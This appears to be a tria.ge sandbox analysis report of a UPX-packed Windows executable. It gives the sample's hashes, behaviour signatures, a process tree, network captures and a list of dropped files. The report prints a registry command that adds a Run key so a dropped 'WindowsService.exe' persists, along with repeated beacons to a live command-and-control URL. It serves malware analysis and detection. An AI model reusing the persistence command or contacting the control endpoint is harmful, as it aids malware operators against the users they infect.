Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

7

Static

static

7

95b0d03bc4...0N.exe

windows7-x64

7

95b0d03bc4...0N.exe

windows10-2004-x64

7

Analysis

  • max time kernel
    120s
  • max time network
    95s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    12/09/2024, 00:57 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    95b0d03bc4d26ea0807cb0c4641f5930N.exe

  • Size

    102KB

  • MD5

    95b0d03bc4d26ea0807cb0c4641f5930

  • SHA1

    fef9dea05244afc84a22bcda36c076c7d18b0d83

  • SHA256

    867d0c72439bab748a559bd1b7bed3be2aa39fc44ad2c4ff0b56c2f4753222ff

  • SHA512

    01085cdabcb94df8f1ef41cb7a4ecc606ee55b3c2f1e065ec97e49f64c2b29adcf7d4c8323d89c8f8cd357470a72caa756a555e66f73bdb849d9776a7b96972e

  • SSDEEP

    3072:xFphTfm1UC7AdYzrV+Dljy/32ubwZZqJ:FhTfmuCkdYzrVolu/J0ZZ

Score
7/10
discoverypersistenceupx

Malware Config

Signatures

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 3 IoCs
  • UPX packed file 15 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Suspicious use of SetThreadContext 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 39 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\95b0d03bc4d26ea0807cb0c4641f5930N.exe
    "C:\Users\Admin\AppData\Local\Temp\95b0d03bc4d26ea0807cb0c4641f5930N.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • System Location Discovery: System Language Discovery
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:624
    • C:\Users\Admin\AppData\Local\Temp\95b0d03bc4d26ea0807cb0c4641f5930N.exe
      "C:\Users\Admin\AppData\Local\Temp\95b0d03bc4d26ea0807cb0c4641f5930N.exe"
      2⤵
      • Checks computer location settings
      • System Location Discovery: System Language Discovery
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2184
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ETURA.bat" "
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4492
        • C:\Windows\SysWOW64\reg.exe
          REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "sidebar" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\SystemWindows\WindowsService.exe" /f
          4⤵
          • Adds Run key to start application
          • System Location Discovery: System Language Discovery
          PID:4832
      • C:\Users\Admin\AppData\Roaming\SystemWindows\WindowsService.exe
        "C:\Users\Admin\AppData\Roaming\SystemWindows\WindowsService.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:4720
        • C:\Users\Admin\AppData\Roaming\SystemWindows\WindowsService.exe
          "C:\Users\Admin\AppData\Roaming\SystemWindows\WindowsService.exe"
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          PID:3424
        • C:\Users\Admin\AppData\Roaming\SystemWindows\WindowsService.exe
          "C:\Users\Admin\AppData\Roaming\SystemWindows\WindowsService.exe"
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          PID:3156

Network

  • flag-us
    DNS
    8.8.8.8.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    8.8.8.8.in-addr.arpa
    IN PTR
    Response
    8.8.8.8.in-addr.arpa
    IN PTR
    dnsgoogle
  • flag-us
    DNS
    13.86.106.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    13.86.106.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    240.221.184.93.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    240.221.184.93.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    76.32.126.40.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    76.32.126.40.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    95.221.229.192.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    95.221.229.192.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    28.118.140.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    28.118.140.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    ilovetehpussay.host4star.com
    WindowsService.exe
    Remote address:
    8.8.8.8:53
    Request
    ilovetehpussay.host4star.com
    IN A
    Response
    ilovetehpussay.host4star.com
    IN A
    185.53.177.50
  • flag-de
    POST
    http://ilovetehpussay.host4star.com/Panel/bot.php
    WindowsService.exe
    Remote address:
    185.53.177.50:80
    Request
    POST /Panel/bot.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: umbra
    Host: ilovetehpussay.host4star.com
    Content-Length: 63
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Thu, 12 Sep 2024 00:57:37 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
    X-Buckets: bucket011
    X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_fOpeG9Jo+3LAnHX84zQem3g959wl74UCbFwxHNQfDHvehzwRwkbGltpYepOcOKbLQDB5fckm80/1x9hOp1n9AQ==
    X-Template: tpl_CleanPeppermintBlack_twoclick
    X-Language: english
    Accept-CH: viewport-width
    Accept-CH: dpr
    Accept-CH: device-memory
    Accept-CH: rtt
    Accept-CH: downlink
    Accept-CH: ect
    Accept-CH: ua
    Accept-CH: ua-full-version
    Accept-CH: ua-platform
    Accept-CH: ua-platform-version
    Accept-CH: ua-arch
    Accept-CH: ua-model
    Accept-CH: ua-mobile
    Accept-CH-Lifetime: 30
    X-Domain: host4star.com
    X-Subdomain: ilovetehpussay
  • flag-de
    POST
    http://ilovetehpussay.host4star.com/Panel/bot.php
    WindowsService.exe
    Remote address:
    185.53.177.50:80
    Request
    POST /Panel/bot.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: umbra
    Host: ilovetehpussay.host4star.com
    Content-Length: 49
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Thu, 12 Sep 2024 00:57:37 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
    X-Buckets: bucket063
    X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_fOpeG9Jo+3LAnHX84zQem3g959wl74UCbFwxHNQfDHvehzwRwkbGltpYepOcOKbLQDB5fckm80/1x9hOp1n9AQ==
    X-Template: tpl_CleanPeppermintBlack_twoclick
    X-Language: english
    Accept-CH: viewport-width
    Accept-CH: dpr
    Accept-CH: device-memory
    Accept-CH: rtt
    Accept-CH: downlink
    Accept-CH: ect
    Accept-CH: ua
    Accept-CH: ua-full-version
    Accept-CH: ua-platform
    Accept-CH: ua-platform-version
    Accept-CH: ua-arch
    Accept-CH: ua-model
    Accept-CH: ua-mobile
    Accept-CH-Lifetime: 30
    X-Domain: host4star.com
    X-Subdomain: ilovetehpussay
  • flag-us
    DNS
    50.177.53.185.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    50.177.53.185.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    183.59.114.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    183.59.114.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    198.187.3.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    198.187.3.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    172.210.232.199.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    172.210.232.199.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    14.227.111.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    14.227.111.52.in-addr.arpa
    IN PTR
    Response
  • 185.53.177.50:80
    http://ilovetehpussay.host4star.com/Panel/bot.php
    http
    WindowsService.exe
    1.1kB
     16.6kB
     19
    17

    HTTP Request

    POST http://ilovetehpussay.host4star.com/Panel/bot.php

    HTTP Response

    200
  • 185.53.177.50:80
    http://ilovetehpussay.host4star.com/Panel/bot.php
    http
    WindowsService.exe
    1.1kB
     16.6kB
     19
    17

    HTTP Request

    POST http://ilovetehpussay.host4star.com/Panel/bot.php

    HTTP Response

    200
  • 8.8.8.8:53
    8.8.8.8.in-addr.arpa
    dns
    66 B
     90 B
     1
    1

    DNS Request

    8.8.8.8.in-addr.arpa

  • 8.8.8.8:53
    13.86.106.20.in-addr.arpa
    dns
    71 B
     157 B
     1
    1

    DNS Request

    13.86.106.20.in-addr.arpa

  • 8.8.8.8:53
    240.221.184.93.in-addr.arpa
    dns
    73 B
     144 B
     1
    1

    DNS Request

    240.221.184.93.in-addr.arpa

  • 8.8.8.8:53
    76.32.126.40.in-addr.arpa
    dns
    71 B
     157 B
     1
    1

    DNS Request

    76.32.126.40.in-addr.arpa

  • 8.8.8.8:53
    95.221.229.192.in-addr.arpa
    dns
    73 B
     144 B
     1
    1

    DNS Request

    95.221.229.192.in-addr.arpa

  • 8.8.8.8:53
    28.118.140.52.in-addr.arpa
    dns
    72 B
     158 B
     1
    1

    DNS Request

    28.118.140.52.in-addr.arpa

  • 8.8.8.8:53
    ilovetehpussay.host4star.com
    dns
    WindowsService.exe
    74 B
     90 B
     1
    1

    DNS Request

    ilovetehpussay.host4star.com

    DNS Response

    185.53.177.50

  • 8.8.8.8:53
    50.177.53.185.in-addr.arpa
    dns
    72 B
     150 B
     1
    1

    DNS Request

    50.177.53.185.in-addr.arpa

  • 8.8.8.8:53
    183.59.114.20.in-addr.arpa
    dns
    72 B
     158 B
     1
    1

    DNS Request

    183.59.114.20.in-addr.arpa

  • 8.8.8.8:53
    198.187.3.20.in-addr.arpa
    dns
    71 B
     157 B
     1
    1

    DNS Request

    198.187.3.20.in-addr.arpa

  • 8.8.8.8:53
    172.210.232.199.in-addr.arpa
    dns
    74 B
     128 B
     1
    1

    DNS Request

    172.210.232.199.in-addr.arpa

  • 8.8.8.8:53
    14.227.111.52.in-addr.arpa
    dns
    72 B
     158 B
     1
    1

    DNS Request

    14.227.111.52.in-addr.arpa

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\ETURA.txt
    Filesize

    157B

    MD5

    f6a90c20834f271a907a4e2bc28184c2

    SHA1

    36c9d1602b74f622346fbb22693597d7889df48d

    SHA256

    73f29cd953eee40cea4de67842556ffd96efe8094a6a9b70f33a35df2582febd

    SHA512

    39cabae19fe1faa37455e4bd242c868be60d6252b07f01224b3f7501c3cf734e503300b840d83381a452707cab6df2f95f920655884be56d4024676b26943804

    Download Submit

  • C:\Users\Admin\AppData\Roaming\SystemWindows\WindowsService.exe
    Filesize

    102KB

    MD5

    051a9c7258cafa027d5c6e96f93e6995

    SHA1

    285f95c6327322ec1438d3a698a44d3022256fe2

    SHA256

    2d6b8b201c157d71400042dd7fca33ab792ab5f51ba8f1ac6e48dc7fb1f4fe16

    SHA512

    a8774150ff2c6a4c4efca4f48d97d3076c9d3b5dbe3d7e9e8d13673c19111af7bf5b249b7284e304672e7428f459d86cf31a6dd511c6bdf886a4a4aa910e1722

    Download Submit

  • memory/624-3-0x0000000002BC0000-0x0000000002BC1000-memory.dmp

    Filesize

    4KB

    Download

  • memory/624-6-0x0000000002C40000-0x0000000002C41000-memory.dmp

    Filesize

    4KB

    Download

  • memory/624-5-0x0000000002C00000-0x0000000002C01000-memory.dmp

    Filesize

    4KB

    Download

  • memory/624-4-0x0000000000400000-0x000000000043B000-memory.dmp

    Filesize

    236KB

    Download

  • memory/624-0-0x0000000000400000-0x000000000043B000-memory.dmp

    Filesize

    236KB

    Download

  • memory/624-12-0x0000000000400000-0x000000000043B000-memory.dmp

    Filesize

    236KB

    Download

  • memory/2184-40-0x0000000000400000-0x000000000040B000-memory.dmp

    Filesize

    44KB

    Download

  • memory/2184-13-0x0000000000400000-0x000000000040B000-memory.dmp

    Filesize

    44KB

    Download

  • memory/2184-9-0x0000000000400000-0x000000000040B000-memory.dmp

    Filesize

    44KB

    Download

  • memory/2184-62-0x0000000000400000-0x000000000040B000-memory.dmp

    Filesize

    44KB

    Download

  • memory/2184-7-0x0000000000400000-0x000000000040B000-memory.dmp

    Filesize

    44KB

    Download

  • memory/2184-60-0x0000000000410000-0x00000000004D9000-memory.dmp

    Filesize

    804KB

    Download

  • memory/3156-51-0x0000000000400000-0x0000000000417000-memory.dmp

    Filesize

    92KB

    Download

  • memory/3156-47-0x0000000000400000-0x0000000000417000-memory.dmp

    Filesize

    92KB

    Download

  • memory/3156-53-0x0000000000400000-0x0000000000417000-memory.dmp

    Filesize

    92KB

    Download

  • memory/3156-56-0x0000000000400000-0x0000000000417000-memory.dmp

    Filesize

    92KB

    Download

  • memory/3156-65-0x0000000000400000-0x0000000000417000-memory.dmp

    Filesize

    92KB

    Download

  • memory/3424-63-0x0000000000400000-0x000000000040B000-memory.dmp

    Filesize

    44KB

    Download

  • memory/4720-42-0x0000000000400000-0x000000000043B000-memory.dmp

    Filesize

    236KB

    Download

  • memory/4720-44-0x0000000000400000-0x000000000043B000-memory.dmp

    Filesize

    236KB

    Download

  • memory/4720-59-0x0000000000400000-0x000000000043B000-memory.dmp

    Filesize

    236KB

    Download

  • memory/4720-43-0x0000000000400000-0x000000000043B000-memory.dmp

    Filesize

    236KB

    Download

  • memory/4720-36-0x0000000000400000-0x000000000043B000-memory.dmp

    Filesize

    236KB

    Download

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.